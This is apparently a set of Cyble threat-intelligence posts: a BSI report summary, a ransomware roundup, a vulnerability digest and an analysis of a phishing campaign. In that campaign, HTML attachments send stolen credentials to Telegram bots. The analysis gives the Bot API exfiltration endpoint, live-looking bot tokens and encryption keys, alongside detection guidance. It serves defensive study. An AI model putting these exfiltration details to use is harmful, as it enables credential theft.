The Federal Office for Information Security (BSI) released its 2025 report on the state of IT security in Germany, and the verdict is unequivocal: there is no all-clear. Despite notable law enforcement successes against major cybercrime groups, Germany's IT security situation remains "tense." The culprit? Inadequately protected attack surfaces that continue to provide easy entry points for threat actors, BSI noted. 

For the first time, the BSI, through its findings, said that while threats have somewhat stabilized, poorly managed attack surfaces are keeping risk levels dangerously high. Most concerning is that 80% of reported attacks now target small and medium-sized enterprises (SMEs)—organizations that often lack the resources and expertise to defend themselves effectively. 

Statistical Snapshot 

Threats 

• Positive developments: International law enforcement operations disrupted major cybercrime groups like LockBit and Alphv, greatly reducing their activity. 

• Botnets: Badbox and Vo1d were the most active globally. 
  The BSI participated in takedown operations through sinkholing measures. 

• Phishing and malware: Over 800 malicious websites per day were detected, though their average lifespan decreased to under two hours, showing faster countermeasures. 

Attack Surface 

• Web-based vulnerabilities remained alarming, with 119 new software vulnerabilities identified daily (+24% year-over-year). 

• Many public-facing systems remained unpatched, posing risk. 

• Germany had 13.2 million reachable [.]de domains, with 47 million vulnerable server services detected. 

• The report urges organizations to adopt attack surface management as routinely as antivirus protection. 

Attacks 

• Cyber espionage: Government institutions were the main target of APTs. 

• Ransomware: Around 950 reported cases, with 72% involving data leaks. 

• Exploitation attacks increased 38% from the prior year. 

• 80% of reported cyberattacks targeted small and medium-sized enterprises (SMEs) due to limited resources and cybersecurity know-how. 

• Critical infrastructure (energy, transport, healthcare, finance) reported dozens of cyber incidents. 

Impact 

• Data leaks surged to 461 incidents involving German institutions. 

Leaked data included: 

• Birth data (92%) 

• Physical addresses (72%) 

• Email addresses (63%) 

• Passwords, financial, and health information 

• Ransom payments decreased in frequency, but the average ransom amount reached an all-time high. 

• IoT devices (like Android smart gadgets) became a growing infection source—many shipped already compromised. 

• 30,000 BadBox-infected and 10,000 Vo1d-infected devices were mitigated via BSI coordination. 

Resilience 

The BSI enhanced its monitoring and certification: 

• 413 Common Criteria certificates issued (105 new in 2025). 

• 8,622 organizations joined the Alliance for Cyber Security. 

Incident management maturity (KRITIS operators): 

• ISMS maturity is mostly at levels 3–4. 

• BCMS maturity is improving. 

Public awareness remains mixed: 

• Citizens know on average 6.1 protection measures, but use only 3.8. 

• Many find measures "too complicated". 

• Common protections: strong passwords, 2FA, password managers. 

• The BSI’s service center handled ~10,500 citizen inquiries on cybersecurity in 2025. 

The Numbers Tell a Sobering Story 

Germany's web attack surface in Q2 2025 comprised approximately 13.2 million [.]de domains accessible from the internet. Of these, 8.1 million domains were reachable via both IPv4 and IPv6, while 5.1 million were accessible only through IPv4. This massive digital footprint represents an enormous challenge for security teams trying to maintain visibility and control. 

The vulnerability landscape has intensified significantly. An average of 119 new vulnerabilities in IT systems were discovered daily during the reporting period—a 24% increase compared to the previous year. This relentless pace of vulnerability disclosure, driven partly by changed reporting policies but also by the growing complexity of software systems, means that organizations face an ever-expanding list of potential weaknesses to address. 

Meanwhile, exploitation attempts have surged. The BSI's MADCAT honeypot measurements showed a 38% increase in exploitation attacks compared to the previous reporting period. Attackers aren't just probing systems—they're actively exploiting weaknesses at an accelerating rate. 

The Cybercrime Landscape in Germany: Stabilization Without Relief 

The threat landscape showed some positive developments during the reporting period. International law enforcement actions against major ransomware operations led to a degree of stabilization. LockBit and AlphV, two previously dominant ransomware groups, were substantially disrupted. This represents a significant victory for coordinated international cybercrime enforcement. 

However, stabilization doesn't mean elimination. Germany ranked third globally among cybercrime group targets at 64%, behind only the United States (94%) and the United Kingdom (71%). The cybercrime ecosystem has proven remarkably resilient, with new groups emerging to fill the void left by disrupted operations. RansomHub, Clop, Akira, Qilin, and Play were among the most active groups during the reporting period, continuing the trend of Ransomware-as-a-Service that makes sophisticated attacks accessible to less skilled criminals. 

The data leak situation has reached alarming levels. During the reporting period, 461 data leaks affected German institutions and consumers. The most commonly compromised information included birth dates (92% of leaks), physical addresses (72%), and email addresses (63%). More sensitive data, such as passwords (36%), payment information (22%), and health data (18%) were also frequently exposed. 

The IoT Botnet Threat 

Perhaps one of the most disturbing revelations in the BSI report concerns IoT botnets, particularly BadBox and Vo1d. BadBox became the largest active botnet in Germany, with up to 58% of infected systems in the country attributed to this single operation. What makes BadBox especially concerning is that devices were infected during the production phase—before they ever reached consumers. 

This represents a fundamental shift in the threat model. Traditional security advice assumes that devices are secure when purchased and become compromised through user behavior or software vulnerabilities. BadBox demonstrates that supply chain compromises can deliver pre-compromised devices directly to consumers and businesses, who have no practical way to detect the infection. 

The BSI responded through sinkholing operations, redirecting communication attempts from infected devices to BSI-controlled servers to prevent further malicious activity. Approximately 30,000 BadBox-infected IoT systems had their communications blocked, and device owners were notified. An additional 10,000 Vo1d-infected device owners received similar notifications. While these remediation efforts represent important defensive actions, they're reactive measures addressing infections that have already occurred. 

The SME Vulnerability Gap 

The statistic that should alarm every business leader in Germany: approximately 80% of reported attacks targeted SMEs. This isn't a random distribution—it's a deliberate strategic shift by attackers toward softer targets. 

The dynamics are straightforward. Large enterprises have dedicated security teams, substantial budgets, and often sophisticated detection and response capabilities. Attacking them requires significant resources and expertise, with no guarantee of success. SMEs, conversely, often operate with limited IT staff, minimal security budgets, and gaps in both technical controls and security awareness. For cybercriminals conducting cost-benefit analyses, SMEs represent the optimal target: easier to compromise, less likely to detect attacks quickly, and numerous enough to provide a steady stream of victims. 

The attack pattern reflects this calculation. Rather than pursuing complex, targeted attacks against well-defended enterprises, threat actors increasingly favor volume-based approaches, hitting many SMEs with relatively simple techniques. Ransomware attacks have become particularly effective against this segment, with 72% of the 950 reported ransomware incidents involving data leaks used to pressure victims into paying. 

Interestingly, while ransom payment rates continued their multi-year decline—dropping to just 26% in Q2 2025 compared to 85% in Q1 2019—the average ransom payment reached all-time highs. This suggests that while fewer victims are paying, those who do pay are facing substantially larger demands, particularly when data leakage is involved. 

Attack Surface Management: The Missing Link 

The BSI's conclusion is direct and unambiguous: "Protection of attack surfaces is the decisive lever for improving cybersecurity in 2026." This isn't merely one recommendation among many—it's identified as the critical factor that will determine whether Germany's cybersecurity situation improves or continues to deteriorate. 

The data support this assessment. Of the accessible IP addresses in Q2 2025, approximately 791,722 showed exposed metadata—potential indicators of security weaknesses. Known vulnerabilities in perimeter systems are patched too late or not at all far too often. Web attack surfaces, in particular, show a "worrying state" that requires more professional attention through effective attack surface management. 

The federal administration provides a microcosm of the challenge. An average of 684,000 active email addresses existed in federal networks daily, along with approximately 1,480 active social media accounts (with high numbers of unreported cases due to private employee accounts). Daily accessible IP addresses of the federal administration with suspected vulnerabilities ranged from zero to over 300 depending on severity level. Even well-resourced government agencies struggle to maintain complete visibility and control over their attack surfaces. 

The BSI argues that attack surface management must become as routine as antivirus software for email. This represents a fundamental shift in thinking—from treating attack surface visibility as an occasional audit activity to recognizing it as a continuous operational necessity. 

The Resilience Gap 

Germany has made substantial investments in cybersecurity awareness and capability building. The Alliance for Cyber Security has grown to include 8,622 companies and institutions. The BSI issued 41 cybersecurity warnings during the reporting period and provided 3,871 reports through its Warning and Information Service. Critical infrastructure operators continue to make progress in implementing Information Security Management Systems (ISMS) and Business Continuity Management Systems (BCMS), with maturity levels steadily improving. 

Yet awareness hasn't translated to sufficient action, particularly among vulnerable groups. Consumer surveys revealed a troubling gap: respondents knew an average of 6.1 protection measures but actually used only 3.8. Both awareness and usage of protection measures declined in 2025. Many respondents cited finding the measures too complicated, suggesting that even when people know what to do, friction in implementation prevents effective security practices. 

The federal administration saw some positive trends, with daily malware attacks via email declining slightly from 772 to 753. However, blocked access attempts to malicious websites increased by 23%, from 9,212 to 11,330 daily attempts. The threat isn't decreasing—it's shifting to channels where defenses may be less mature. 

From Awareness to Protection 

The BSI report makes clear that incremental improvements won't suffice. Every organization—regardless of size—must treat attack surface analysis and management as indispensable components of effective risk management. This requires several shifts in thinking and practice: 

First, organizations must move from periodic security assessments to continuous monitoring. Attack surfaces change too rapidly for annual or quarterly reviews to provide meaningful protection. What was secure yesterday may be vulnerable today. 

Second, vulnerability management must evolve from attempting comprehensive patching to intelligent prioritization. With 119 new vulnerabilities discovered daily, teams must focus on vulnerabilities that pose actual risk to their specific environments—those being actively exploited, affecting internet-facing systems, or for which exploit code exists in underground markets. 

Third, SMEs must receive targeted support. Expecting resource-constrained small businesses to independently develop sophisticated security programs isn't realistic. Industry associations, government agencies, and technology providers must collaborate on solutions that are accessible, affordable, and appropriately scaled for SME needs. 

Fourth, supply chain security must extend beyond vendor questionnaires to continuous monitoring of partner security postures. The question isn't whether a vendor had good security six months ago—it's whether they're secure right now. 

Building Proactive Defenses in a Tense Environment 

The BSI characterizes Germany's IT security situation as "tense," and the data justifies this assessment. Threats have stabilized at high levels rather than diminishing. Attack surfaces continue expanding faster than organizations can secure them. Risks remain elevated because too many vulnerabilities go unaddressed. Damage effects, measured in data leaks and financial costs, show no signs of declining. 

Yet the report also demonstrates that focused efforts produce measurable results. Law enforcement actions disrupted major cybercrime groups. Sinkholing operations neutralized tens of thousands of botnet infections. Critical infrastructure operators improved their security management maturity. These successes prove that the situation, while tense, isn't hopeless. 

What's needed is a fundamental reorientation toward proactive attack surface management. Organizations that understand what attackers see, prioritize vulnerabilities that matter, and maintain continuous visibility over their digital footprint will significantly reduce their risk exposure. Those that don't will remain attractive targets in an increasingly hostile threat landscape. 

The BSI's message is clear. Protect attack surfaces now, or accept increasing risk. For Germany's businesses—particularly the SMEs absorbing 80% of attacks—this isn't a theoretical concern. It's an operational imperative that will determine which organizations thrive and which become the next breach statistics in next year's report. 

Taking Action on Attack Surface Management 

The challenges identified in Germany's BSI report aren't unique to German organizations—they're indicative of global trends affecting businesses worldwide. Expanding attack surfaces, persistent threats, and vulnerability management at scale are universal challenges requiring comprehensive visibility and continuous monitoring. 

Cyble's threat intelligence platform addresses these core challenges through integrated attack surface management, real-time vulnerability intelligence, and dark web monitoring. Organizations gain visibility into their exposed assets, prioritize vulnerabilities based on active exploitation, and receive early warnings about threats emerging in underground forums—the same capabilities the BSI report identifies as critical for improving cybersecurity posture.  

For organizations looking to move from reactive security to proactive AI-driven attack surface protection, request a demo to explore how comprehensive threat intelligence can strengthen your defenses. 

Reference: 

• https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2025_Achtseiter.pdf 

• https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2025_Systematik_Lagebewertung.pdf 

The post Germany Urges Attack Surface Management Adoption as Routinely as Antivirus Protection appeared first on Cyble.

Ransomware attacks soared to the second-highest total on record in October 2025. 

October’s 623 ransomware attacks were up more than 30% from September, and below only February 2025’s record totals (chart below). It was the sixth consecutive monthly increase in ransomware attacks. 

Qilin was the most active ransomware group for the sixth time in the last seven months, its 210 claimed victims, three times higher than second-place Akira (chart below). Also of note is the third-place showing of Sinobi with 69 victims claimed, a rapid ascendance for a group that first emerged in July 2025. We include high-confidence Qilin indicators of compromise (IoCs) from October 2025 in an appendix below. 

Construction, Professional Services, Healthcare, Manufacturing, IT and Energy/Utilities were the most attacked sectors (chart below). 

In October, 31 incidents potentially impacted critical infrastructure, and 26 incidents had possible supply chain implications. 

The U.S. was by far the most attacked country once again, its 361 attacks 10 times more than second-place Canada (chart below). Of concern is the emergence of Australia as a top-five target, as the country’s rich resources and high per-capita GDP have made the country a rich target for threat actors. 

Year-to-date, ransomware attacks are up 50% from the first 10 months of 2024 to 5,194 ransomware attacks through October 31, as new leaders like Qilin, Sinobi, and The Gentlemen have more than made up for the decline of former leaders such as LockBit and RansomHub. 

Vulnerabilities Weaponized by Ransomware Groups in October 

Fueling the increase in both ransomware and supply chain attacks this year has been a steady supply of critical IT vulnerabilities, as well as a large number of unpatched internet-facing assets. Among the vulnerabilities targeted in October were: 

• Oracle E-Business Suite remote SSRF/XSL RCE (CVE-2025-61882) – targeted by Cl0p 

• GoAnywhere MFT deserialization RCE (CVE-2025-10035) – Medusa 

• Microsoft Windows Privilege Escalation Vulnerability (CVE-2021-43226) – Unknown ransomware groups (CISA advisory) 

• Velociraptor Incorrect Default Permissions (CVE-2025-6264) – Warlock ransomware operators 

• Linux kernel’s netfilter :nf_tables module (CVE‑2024‑1086) – Unknown ransomware groups (CISA advisory) 

Ransomware Attacks and Key Developments 

Below are some of the most important ransomware developments in October 2025, culled from Cyble and OSINT sources. 

The Cl0p ransomware group exploited a critical vulnerability (CVE-2025-61882) in Oracle EBusiness Suite versions 12.2.3–12.2.14 to achieve remote code execution (RCE) via a server-side request-forgery (SSRF) that forces the application to fetch and execute a malicious XSL payload. The group sent extortion emails and appears to be leveraging this exploit as an entry point for data theft and ransomware deployment. 

Medusa ransomware chained an unauthenticated deserialization RCE in GoAnywhere MFT (CVE-2025-10035) to gain initial access, then maintained persistence and remote control by abusing RMM tooling (SimpleHelp and MeshAgent), dropping RMM binaries directly under the GoAnywhere process and creating .jsp web shells in MFT directories. They performed user/system discovery and network scans (e.g., netscan), moved laterally using mstsc.exe (RDP), and used the RMM infrastructure (plus a Cloudflare tunnel) for command and control (C2). Data theft was performed with Rclone in at least one incident, and Medusa ransomware was later deployed in at least one confirmed environment. 

Ransomware operators are increasingly hijacking or silently installing legitimate remote access tools (AnyDesk, RustDesk, Splashtop, TightVNC, etc.) after credential compromise to gain persistent, stealthy access, using these trusted channels for file transfer, interactive control, antivirus neutralization, and ransomware delivery. Attack paths include credential theft/brute force, modifying existing tool configs or using silent install flags, escalating to SYSTEM, disabling defenses, and propagating the tools to support lateral movement and final encryption. 

Warlock operators installed an outdated version of the open-source Velociraptor on multiple servers to establish stealthy persistence and remote control, then used it alongside a pre-existing vulnerability (CVE-2025-6264) and GPO modifications to disable defenses. They later deployed Warlock, LockBit and Babuk ransomware variants within the same engagement, while also exfiltrating data and encrypting virtual machine environments. 

Recent BlackSuit campaigns employed Vishing to steal VPN credentials for initial access and performed DCSync on a domain controller for high-privilege credentials. In addition, the group deployed AnyDesk and a custom RAT for persistence. Other measures included wiping forensic traces with CCleaner, and using Ansible to deploy BlackSuit ransomware across ESXi hosts, encrypting hundreds of VMs and causing major operational disruption. 

The threat actor Vanilla Tempest conducted a campaign that distributed fake Microsoft Teams installers hosted on look-alike domains. The installers used fraudulently signed certificates, delivering the Oyster backdoor and ultimately Rhysida ransomware. Microsoft disrupted the operation in early October by revoking more than 200 certificates. 

Qilin affiliates deployed a Linux-based ransomware binary on Windows machines by abusing legitimate remote-management tools (WinSCP, Splashtop, AnyDesk, ScreenConnect) and leveraging BYOVD (Bring Your Own Vulnerable Driver) attacks. In addition, other affiliates used a staged toolkit (SharpDecryptPwd, Mimikatz, NirSoft utilities) plus a WDigest registry tweak to harvest credentials, and exfiltrate data via abused cloud tools like Cyberduck (multipart uploads to Backblaze). 

Trigona ransomware operators brute-forced exposed MS-SQL servers, embedding malware inside database tables and exporting it to disk via bcp.exe to install payloads (e.g., AnyDesk, Teramind). The actor also deployed Rust-based RDP/MS-SQL scanners, a Go SQL-injection tester (“StressTester”), and custom delete/replace binaries—an automated, SQL-centric intrusion chain that weaponizes legitimate DB tooling for initial access and payload delivery. 

On October 9, DragonForce posted on the RAMP forum that it is opening its partner program to the public. New affiliates can register and immediately access a suite of free “partner services,” including professional file analysis/audit, hash decryption, call support, and free victim storage. Registration requires a $500 non-refundable fee; payments accepted in XMR and BTC. The group warned affiliates to follow its rules or face account blocking or free decryptor distribution. 

On October 18, threat actor Zeta88 — alleged operator of The Gentlemen ransomware — announced on RAMP updates to their Windows, Linux and ESXi lockers, adding automatic self-restart and run-on-boot, a silent mode for Windows that encrypts without renaming files and preserves timestamps, and self-spread capabilities across networks/domains using WMI/WMIC, SCHTASKS, SC (Service Control) and PowerShell Remoting. The release also introduced flexible encryption-speed modes, multiple Windows operating modes, and a universal decryptor covering all operating modes. 

Conclusion 

The alarming increase in ransomware attacks in October – and the continual investment in upgrades and innovations by ransomware groups – highlights the need for security teams to respond with equal vigilance. Basic cybersecurity best practices that can help protect against a wide range of cyber threats include: 

• Prioritizing vulnerabilities based on risk. 

• Protecting web-facing assets. 

• Segmenting networks and critical assets. 

• Hardening endpoints and infrastructure. 

• Strong access controls, allowing no more access than is required, with frequent verification. 

• A strong source of user identity and authentication, including multi-factor. authentication and biometrics, as well as machine authentication with device compliance and health checks. 

• Encryption of data at rest and in transit. 

• Ransomware-resistant backups that are immutable, air-gapped, and isolated as much as possible. 

• Honeypots that lure attackers to fake assets for early breach detection. 

• Proper configuration of APIs and cloud service connections. 

• Monitoring for unusual and anomalous activity with SIEM, Active Directory monitoring, endpoint security, and data loss prevention (DLP) tools. 

• Routinely assessing and confirming controls through audits, vulnerability scanning, and penetration tests. 

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. 

Appendix: IoCs Associated with Qilin Ransomware Group, October 2025 

The post October 2025 Attacks Soar 30% as New Groups Redefine the Cyber Battlefield  appeared first on Cyble.

Cyble vulnerability intelligence researchers tracked 905 vulnerabilities in the last week, and more than 30 already have a publicly available Proof-of-Concept (PoC), significantly increasing the likelihood that those vulnerabilities may face real-world attacks. 

A total of 54 vulnerabilities were rated as critical under the CVSS v3.1 scoring system, while 35 received a critical severity rating based on the newer CVSS v4.0 scoring system. 

Here are some of the IT and ICS vulnerabilities flagged by Cyble threat intelligence researchers as meriting high-priority attention by security teams, including vulnerabilities under discussion by threat actors and three 10.0-severity vulnerabilities in airport weather systems. 

The Week’s Top IT Vulnerabilities 

CVE-2025-12531 is a critical Improper Restriction of XML External Entity Reference vulnerability in IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6, which a remote attacker could exploit to expose sensitive information or consume memory resources. 

CVE-2025-34294 is a high-severity Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Wazuh's File Integrity Monitoring (FIM). When configured with automatic threat removal, Wazuh contains a TOCTOU race condition that could potentially be exploited for SYSTEM-level arbitrary file or folder deletion and local privilege escalation. 

CVE-2025-12599 is a 10.0-severity cryptographic vulnerability related to the use of hard-coded cryptographic keys in Azure Access Technology's BLU-IC2 and BLU-IC4 devices through 1.19.5. 

CVE-2025-48703 is a critical remote code execution vulnerability in CentOS Web Panel (CWP) that could potentially allow an unauthenticated attacker who knows a valid non-root username to execute arbitrary commands on the server. The vulnerability has a high impact and is actively exploited, affecting over 200,000 servers worldwide. It was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog this week. 

CVE-2025-41244 is a high-severity local privilege escalation zero-day vulnerability in VMware Tools and VMware Aria Operations that was also added to the CISA KEV catalog this week. A malicious local actor with non-administrative privileges with access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled could potentially escalate privileges to root on the same VM. 

CVE-2025-59287 continues to generate discussion by security researchers and threat actors, and Cyble honeypot sensors have detected attack attempts on the critical remote code execution vulnerability in Microsoft's Windows Server Update Services (WSUS). Remote unauthenticated attackers could potentially execute arbitrary code with SYSTEM privileges by exploiting unsafe deserialization of AuthorizationCookie objects. 

CVE-2023-20198 is attracting renewed attention because of an Australian Signals Directorate warning that threat actors are targeting unpatched Cisco devices. The critical vulnerability in the web UI of Cisco IOS XE software could allow a remote, unauthenticated attacker to create an account on the device and gain full administrator privileges, effectively taking full control of the system. The vulnerability affects a large number of internet-exposed Cisco devices. 

Vulnerabilities Discussed on Underground Forums 

Cyble dark web researchers observed several threat actors discussing weaponizing vulnerabilities on cybercrime and underground forums. Vulnerability exploits under discussion include: 

CVE-2025-64095: A critical vulnerability affecting DNN (formerly DotNetNuke), an open-source web content management platform in the Microsoft ecosystem. The flaw exists in the default HTML editor provider in versions prior to 10.1.1. It could allow unauthenticated users to upload files and overwrite existing files without authorization or validation. This can lead to website defacement and potentially enable the injection of cross-site scripting (XSS) payloads when combined with other vulnerabilities. 

CVE-2025-52665: A critical security vulnerability affecting Ubiquiti Inc.'s UniFi Access Application versions 3.3.22 through 3.4.31. The flaw arises from a misconfiguration that exposes a management API without proper authentication, potentially allowing a malicious actor with access to the management network to exploit it. The flaw could enable unauthenticated remote code execution (RCE), potentially allowing attackers to manipulate door access controls, retrieve sensitive information, or gain full control over affected devices. The vulnerability impacts the confidentiality, integrity, and availability of physical access control systems. 

CVE-2025-50168: A high-severity type confusion vulnerability in the Windows Win32K - ICOMP component. This vulnerability could allow an authorized attacker with local access and low privileges to escalate their privileges by causing the system to access a resource using an incompatible type. The flaw lies in the improper validation of user-supplied data, leading to this type of confusion condition. 

CVE-2024-38077: A critical vulnerability found in the Windows Remote Desktop Licensing Service, which poses a significant risk by potentially allowing remote code execution (RCE) on multiple affected Windows Server systems. 

CVE-2025-6440: A critical vulnerability in the WooCommerce Designer Pro plugin for WordPress, specifically affecting all versions up to and including 1.9.26. This flaw could allow unauthenticated attackers to upload arbitrary files, including executable scripts, to a website’s server, potentially leading to remote code execution and full site compromise. 

ICS Vulnerabilities 

Cyble researchers also highlighted critical industrial control system (ICS) vulnerabilities in Survision and Radiometrics products. 

Radiometrics VizAir Versions prior to 08/2025 are affected by three 10.0-severity vulnerabilities (CVE-2025-61945, CVE-2025-54863 and CVE-2025-61956). The Insufficiently Protected Credentials and Missing Authentication for Critical Function vulnerabilities could allow attackers to manipulate critical weather parameters and runway settings, mislead air traffic control and pilots, extract sensitive meteorological data, and cause significant disruption to airport operations, leading to hazardous flight conditions. 

CVE-2025-12108 is a critical Missing Authentication for Critical Function vulnerability affecting Survision License Plate Recognition LPR Camera. Successful exploitation of the vulnerability could allow an attacker to execute arbitrary code.  

Conclusion 

The wide range of vulnerable cyber and physical systems covered in this week’s report highlights the vast challenges confronting security teams, who must be able to respond with rapid, well-targeted actions to successfully defend IT and critical infrastructure. A risk-based vulnerability management program should be at the heart of those defensive efforts.  

Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets; removing or protecting web-facing assets; Zero-Trust access principles; ransomware-resistant backups; hardened endpoints, infrastructure, and configurations; network, endpoint, and cloud monitoring; and well-rehearsed incident response plans.  

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. 

Stay ahead of threats with Cyble’s Attack Surface Management. 

Schedule a Personalized Demo and see how Cyble helps you defend smarter. 

The post The Week in Vulnerabilities: From IT Systems to Airport Weather Monitoring appeared first on Cyble.

Cyble Research and Intelligence Labs (CRIL) have uncovered a widespread phishing campaign targeting multiple brands to steal credentials. Attackers distribute HTML attachments through email, successfully bypassing conventional security checks by not using suspicious URLs or hosting on external servers. The embedded HTML files run JavaScript that steals user credentials and sends them directly to attacker-controlled Telegram bots.

The infection chain, outlined in Figure 1, showcases the stages of the attack.

Technical findings

In this campaign, the adversary used an HTML file in the email as an attachment (RFC-compliant filename, such as RFQ_4460-INQUIRY.HTML) or as an archive. The HTML contains embedded JavaScript that accepts credentials on a fake Adobe login UI and posts them to the Telegram Bot API using a bot token and chat ID.

The social lure used is a standard procurement/advice flow: an unsolicited request for quotation (RFQ) or invoice, which asks the recipient to open the attached document and "sign in to view."  (see Figure 2)

The malicious file is a self-contained HTML page. It loads a blurred background invoice image and renders a centered login modal. No external hosting is required for the initial file; the HTML itself is the attachment. (see Figure 3)

Credential capture flow:

• The victim opens the HTML attachment either in a web browser or in a PDF viewer capable of rendering HTML (some email clients enable opening attachments in a browser sandbox).
• The page shows a simulated Adobe sign-in form featuring email and password fields.
• On form submission, the page executes JavaScript that reads the field values and constructs a message payload.
• The script performs an HTTP POST to https://api.telegram.org/bot<BotToken>/sendMessage with chat_id and text fields containing the harvested credentials.
• The script then displays an error or "invalid login" message to avoid suspicion and prevent the user from attempting to log in again immediately.

An excerpt of the exfiltration activity is shown in Figure 4.

Infrastructure

Harvested credentials are transmitted directly to Telegram via the Bot API using hard-coded bot tokens and chat IDs embedded in the JavaScript of multiple samples.

We analysed two representative samples that revealed the technical sophistication:

Sample 1

• Implements CryptoJS AES encryption for obfuscation (key: 8525965283890, iv: 4842043763)
• Harvests Email Address and Password, captures IP Address and user-agent, followed by exfiltration to Telegram
• Uses a dual-capture mechanism, forcing the victim to enter passwords twice, flashing wrong credential entered pop-up
• Integrates jQuery and external IP services (api.ipify.org, http://ip-api.com ) to capture IP Address of the victims
• Redirects to legitimate adobe.com after harvesting the credentials

Sample 2

• The sample used a native Fetch API for cleaner implementation
• Displays "The login is invalid" to force the victims to make multiple credential input attempts
• Anti-forensics implementation blocks F12, Ctrl+U/S/C/A/X, Ctrl+Shift+I, right-click context menu, text selection (selectstart), and drag events. This leads to the prevention of victims and analysts from inspecting code, viewing source, copying content, or extracting assets. Meanwhile, the sendData() function exfiltrates email and password credentials to the Telegram Bot API (api.telegram.org/bot) via a POST request with a chat_id parameter, thereby bypassing traditional server-based C2 infrastructure. (see Figure 5)

Both samples share core functionality as shown in Figure 6.

Telegram Bot Intelligence:

An analysis of the campaign infrastructure uncovers a decentralized network of Telegram bots operated by multiple threat actors.

Multiple active bot tokens were identified and confirmed in the ecosystem, each showcasing distinct, or in some cases, unique operational behavior.

• Bot Naming Conventions: garclogtools_bot, v8one_bot, thatboi_bot, dollsman_bot, davhapbot, clockwise47_bot
• Operator Profiles: Recipients include accounts with usernames like Rharfel, joedollar23telegram, Shorelight, coded404, marie_jane_01
• Infrastructure Reuse: Bot token 7447553175:AAF2ifSM0-b7OiF-E4ZzqeDVthDALq-IexQ appears across multiple FedEx-themed samples, bot token 8155473646:AAEZzrw4q_ZZws1J8mJOcqFix9bAnFYeFlo observed across multiple Adobe and WeTransfer-themed samples.

Scale & actor behaviour:

Recent research conducted over the past month has identified many distinct HTML samples in circulation, suggesting broad reuse or automation. The templates and user interface components are consistent, including Adobe-style branding, blurred backgrounds on invoices, and centered elements modals, indicating the use of a toolkit or an automated generator. (see Figure 7)

Geographic targeting

Based on our threat intelligence analysis, the campaign primarily targets organizations across Central and Eastern Europe, with heavy concentration in the Czech Republic, Slovakia, Hungary, and Germany.

The attackers distribute phishing emails posing as legitimate customers or business partners, requesting quotations or invoice confirmations. This regional focus is evident through targeted recipient domains belonging to local enterprises, distributors, government-linked entities, and hospitality firms that routinely process RFQs and supplier communications.

Identified targeted industries include:

• Agriculture & Livestock
• Automotive
• Construction
• Consumer Goods
• Education
• Energy & Utilities
• Government & LEA
• Hospitality
• IT & ITES
• Manufacturing
• Media & Entertainment
• Professional Services
• Retail
• Telecommunications
• Technology

Brand Impersonation Strategy

The threat actors employ a sophisticated multi-brand approach tailored to regional preferences and business contexts.

The brands leveraged by this campaign are as follows

Global Brands (see Figure 8)

• Adobe (PDF/Document viewers)
• Microsoft (Excel, Outlook, Generic login)
• WeTransfer (File sharing)
• DocuSign (Electronic Digital Signature Platform)

Logistics/Shipping brands (see Figure 9)

• FedEx (international shipping)
• DHL (regional and international delivery)

Regional Service brands (see Figure 10)

• Telekom Deutschland/T-Mobile (German telecommunications)
• Roundcube (open-source webmail popular in Europe)
• Generic corporate portals customized per region

The campaign is likely designed to mimic common B2B communication in the sectors mentioned above. For Central European targets, the threat actor employs RFQ-style subject lines and procurement terminology. For broader audiences, they emphasize themes like document sharing and shipping notifications.

This dual strategy, which merges regional business email styles with globally recognized brand impersonation, enhances success rates across diverse organizational cultures and security awareness levels.

The modular template system enables quick deployment of new brand variants, suggesting that additional brands not listed could also be in circulation. The presence of German-language Telekom variants and Spanish-language sales department targeting shows the campaign's ability to tailor branding and language for specific regional markets.

Campaign Evolution

The technical variations between samples indicate ongoing development:

• Obfuscation progression: From plain JavaScript to AES encryption
• Anti-analysis enhancement: Addition of keyboard/mouse event blocking
• UI sophistication: Evolution from basic forms to polished, brand-authentic interfaces
• API modernization: Migration from jQuery $.ajax to native Fetch API
• Language expansion: English-only to multi-language support, including German, Korean, and Spanish

In addition to this, we also identified the following:

• Conditional Execution: Telegram exfiltration only triggers upon actual credential entry, avoiding detection in automated sandboxes
• CDN Abuse: Leverages legitimate services (CloudFront, Cloudflare) to blend with normal traffic

Domain Masquerading: References to trusted domains enhance legitimacy

Conclusion

A sophisticated credential-harvesting attack that is also scalable poses a potent threat. This campaign attempts to circumvent traditional security measures by using HTML attachments. Impersonating trusted brands, targeting specific audiences, and using Telegram for data exfiltration pose a low-cost yet high-impact threat to organizations worldwide.

As obfuscation techniques and anti-analysis tactics evolve, SOCs' measures show ongoing development and improvement. Organizations should prioritize deploying HTML attachment controls and blocking the Telegram API as key components of their security strategy, while also enhancing overall email security to provide long-term protection.

The scale of this operation, with multiple samples of different themes across different industries and multiple active bots, suggests a significant ongoing compromise of business credentials. Security teams should conduct retroactive threat hunts for the identified indicators and assume potential account compromises for any users who may have interacted with these attachments.

Our Recommendations:

For end users:

• Do not open unsolicited HTML attachments. If you must view an attachment, open it in a secure, sandboxed environment or convert it to PDF using a trusted service.
• Treat any prompt asking to re-enter credentials on top of an attachment/document with caution.

For SOCs/Defenders:

• Hunt for api.telegram.org POST activity from clients that wouldn’t normally call the Telegram Bot API.
• Monitor connections to third-party services, including api.ipify.org, ip-api.com, image conversion/sharing services (e.g., pngtoico.io, imgur.com), and fake login domains.
• Add content inspection for attachments: flag HTML attachments containing fetch (or XMLHttpRequest that reference telegram.org or other public C2 endpoints.
• Block or proxy direct traffic to the Telegram Bot API for endpoints that should not require it. Where blocking is not possible, inspect payloads for potential credentials.
• Implement attachment handling policies: block or sandbox .html attachments.
• Treat .html/.htm /.shtml attachments as high-risk file types requiring additional scrutiny. Implement content inspection for all HTML-based attachments before delivery to end users.

MITRE ATT&CK® Techniques

Indicators of compromise (IoCs)

The IOCs have been added to this GitHub repository. Please review and integrate them into your Threat Intelligence feed to enhance protection and improve your overall security posture.

Static indicators (from analysed samples):

• Attachment file names: patterns like RFQ_*, INQUIRY.html, Quotation.html (varies by sample).
